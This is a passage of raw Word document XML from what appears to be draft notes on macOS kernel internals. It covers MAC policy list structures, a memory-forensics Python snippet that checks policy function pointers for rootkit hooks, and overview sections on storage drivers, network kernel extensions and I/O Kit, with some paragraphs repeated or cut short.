          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760310">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mac_policy_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRPr="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="233"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810CCE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each element is of type mac_policy_list_element </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRPr="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="233"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810CCE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">•Name of the policy - &lt;element&gt;.mpc.mpc_name </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRPr="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810CCE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Function pointers - &lt;element&gt;.mpc.mpc_ops </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc445313287"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_mac_policy_list</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRPr="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0BBE" w:rsidRDefault="00810CCE" w:rsidP="003D0BBE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc445313288"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mac_policy_element</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRPr="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc445313289"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enum mac policy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE"/>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">        list_addr = self.addr_space.profile.get_symbol("_mac_policy_list")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">        plist = obj.Object("mac_policy_list", offset = list_addr, vm = self.addr_space)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">        parray = obj.Object('Array', offset = plist.entries, vm = self.addr_space, targetType = 'mac_policy_list_element', count = plist.staticmax + 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE"/>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">        for ent in parray:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">            # I don't know how this can happen, but the kernel makes this check all over the place</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">            # the policy isn't useful without any ops so a rootkit can't abuse this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">            if ent.mpc == None:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">                continue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE"/>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">            name = ent.mpc.mpc_name.dereference()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE"/>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">            ops = obj.Object("mac_policy_ops", offset = ent.mpc.mpc_ops, vm = self.addr_space)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE"/>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            # walk each member of the struct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">            for check in ops_members:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">                ptr = ops.__getattr__(check)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">                if ptr.v() != 0 and ptr.is_valid():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">                    (good, module) = common.is_known_address_name(ptr, kernel_symbol_addresses, kmods) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00810CCE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE"/>
    <w:p w:rsidR="003D0BBE" w:rsidRDefault="00810CCE" w:rsidP="00810CCE">
      <w:r>
        <w:t xml:space="preserve">                    yield (good, check, module, name, ptr)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55DE4" w:rsidRDefault="00D55DE4" w:rsidP="00810CCE"/>
    <w:p w:rsidR="00D55DE4" w:rsidRDefault="00D55DE4" w:rsidP="00810CCE"/>
    <w:p w:rsidR="00D55DE4" w:rsidRDefault="00D55DE4" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc445313290"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Storage System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55DE4" w:rsidRPr="006B4005" w:rsidRDefault="00D55DE4" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc445313291"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="00287686" w:rsidRDefault="00D55DE4" w:rsidP="00287686">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16A7C162" wp14:editId="3CB29475">
            <wp:extent cx="31623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300" cy="3314700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55DE4" w:rsidRDefault="00287686" w:rsidP="00287686">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005952E9">
        <w:t>An abstract view of the drivers involved in supporting a storage device</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00287686" w:rsidRDefault="00287686" w:rsidP="00287686">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IOKit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>框架并不会让会应用程序直接与驱动程序连接，而是需要引用一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>IOUserClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>作为媒介，其原因是因为应用程序与驱动程序并非一对一的关系，驱动程序可能需要同时为多个应用提供服务，而应用程序也可以同时与多个驱动对象交互，所以每一个连接就需要一个对象来进行维护，而这个工作就是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>IOUserClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>来完成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>大多情况下你会根据需求编写子类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>，这与面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00287686" w:rsidRDefault="00287686" w:rsidP="00287686">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>IOKit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>框架并不会让会应用程序直接与驱动程序连接，而是需要引用一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>IOUserClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>作为媒介，其原因是因为应用程序与驱动程序并非一对一的关系，驱动程序可能需要同时为多个应用提供服务，而应用程序也可以同时与多个驱动对象交互，所以每一个连接就需要一个对象来进行维护，而这个工作就是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>IOUserClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>来完成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>大多情况下你会根据需求编写子类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>，这与面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86689" w:rsidRPr="006B4005" w:rsidRDefault="00E86689" w:rsidP="00E86689">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc445313292"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="00E86689" w:rsidRPr="00E86689" w:rsidRDefault="00E86689" w:rsidP="00287686">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>并不会让会应用程序直接与驱动程序连接，而是需要引用一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>IOUserClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:cs="Arial"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>作为媒介，其原因是因为应用程序与驱动程序并非一对一的关系，驱动程序可能需要同时为多个应用提供服务，而应用程序也可以同</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85D30" w:rsidRDefault="00F85D30" w:rsidP="00F85D30">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc445313293"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NKE</w:t>
      </w:r>
      <w:r w:rsidR="00D415C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Network Kernel Extension)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85D30" w:rsidRPr="006B4005" w:rsidRDefault="00F85D30" w:rsidP="00F85D30">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc445313294"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w:rsidR="00F85D30" w:rsidRDefault="00F85D30" w:rsidP="00F85D30">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F85D30" w:rsidRPr="00FA2766" w:rsidRDefault="00F85D30" w:rsidP="00F85D30">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85D30">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/NKEConceptual/about/about.html#//apple_ref/doc/uid/TP40001858-CH226-SW1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85D30" w:rsidRDefault="00F85D30" w:rsidP="00F85D30">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EC50DC5" wp14:editId="38AE01C7">
            <wp:extent cx="4532630" cy="4278630"/>
            <wp:effectExtent l="0" t="0" r="1270" b="7620"/>
            <wp:docPr id="1" name="Picture 1" descr="NK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E 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630" cy="4278630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220FEC" w:rsidRDefault="00F85D30" w:rsidP="00F85D30">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NKE architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85D30" w:rsidRDefault="00F85D30" w:rsidP="00F85D30"/>
    <w:p w:rsidR="00F85D30" w:rsidRDefault="00F85D30" w:rsidP="00F85D30">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc445313295"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I/O Kit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85D30" w:rsidRPr="006B4005" w:rsidRDefault="00F85D30" w:rsidP="00F85D30">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc445313296"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w:rsidR="00F85D30" w:rsidRDefault="00D24B08" w:rsidP="00F85D30">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="604619E7" wp14:editId="1E92BAFC">
            <wp:extent cx="5274310" cy="59256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925663"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D24B08" w:rsidRDefault="00D24B08" w:rsidP="00D24B08">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>. Overview of IOKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4"/>
    <w:p w:rsidR="001011F4" w:rsidRPr="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F42264" wp14:editId="72A67877">
            <wp:extent cx="5274310" cy="57065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06510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>. IOKit class hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85D30" w:rsidRPr="00D24B08" w:rsidRDefault="00F85D30" w:rsidP="00F85D30"/>
    <w:p w:rsidR="00F85D30" w:rsidRDefault="00F85D30" w:rsidP="00F85D30">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06870683" wp14:editId="0511938E">
            <wp:extent cx="4107180" cy="4097655"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/art/kernel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pple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/art/kernel_0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180" cy="4097655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
